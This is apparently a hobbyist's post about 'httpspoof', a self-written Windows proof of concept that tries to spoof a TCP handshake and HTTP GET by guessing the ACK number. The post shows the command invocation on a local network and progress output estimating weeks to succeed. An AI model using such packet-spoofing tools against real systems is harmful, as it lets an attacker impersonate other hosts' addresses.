Somebody on a forum posted a survey about the feasibility of spoofing the TCP handshake without having knowledge of the Ack number. I was bored so I whipped up a potential proof of concept example. Don't run it against anything on the Internet, it is intended as a local network proof of concept only. Seriously, spoofing packets on the internet is a dick move. I don't want to hear about it if you get yourself in trouble.
Httpspoof tries to do an http get against / on a specified ip/domain name with a specified spoofed IP address. I haven't run it successfully, it is single threaded and appears that it would take about 18 days to get a reasonable chance at colliding with the real Ack number when run on my local test network.
I twisted httpspoof out of tcproute, so it shares a lot of the same options, requirements and caveats. In particular it requires a WinPcap installation and some Microsoft packages for the WinPcap dlls.
C:\>httpspoof.exe --lip 192.168.2.123 --lmac 90:b1:1c:XX:XX:XX 192.168.2.5 Available interfaces: (use with -i to avoid interaction next time) 1. Network adapter 'Realtek PCIe GBE Family Controller' on local host rpcap://\Device\NPF_{962899E7-D4BB-49E6-BACB-7AD9F32842F4} Internet 192.168.2.20 Select the listening interface (1-1): 1 Ensuring gateway address (192.168.2.1) is in arp... OK! Using the following values: --------------------------- Local IP: 192.168.2.123 Local MAC: 90:b1:1c:XX:XX:XX Gateway MAC: 00:1F:5B:XX:XX:XX Remote IP: 192.168.2.5 Hitting / on 192.168.2.5:80 1000 attempts. Statistically expect 0.0000002328306 hits by now. ~1672446.96125748s left 2000 attempts. Statistically expect 0.0000004656613 hits by now. ~1624139.76954944s left 3000 attempts. Statistically expect 0.0000006984919 hits by now. ~1606849.58135746s left 4000 attempts. Statistically expect 0.0000009313226 hits by now. ~1599732.74637451s left 5000 attempts. Statistically expect 0.0000011641530 hits by now. ~1593367.59815554s left ... etc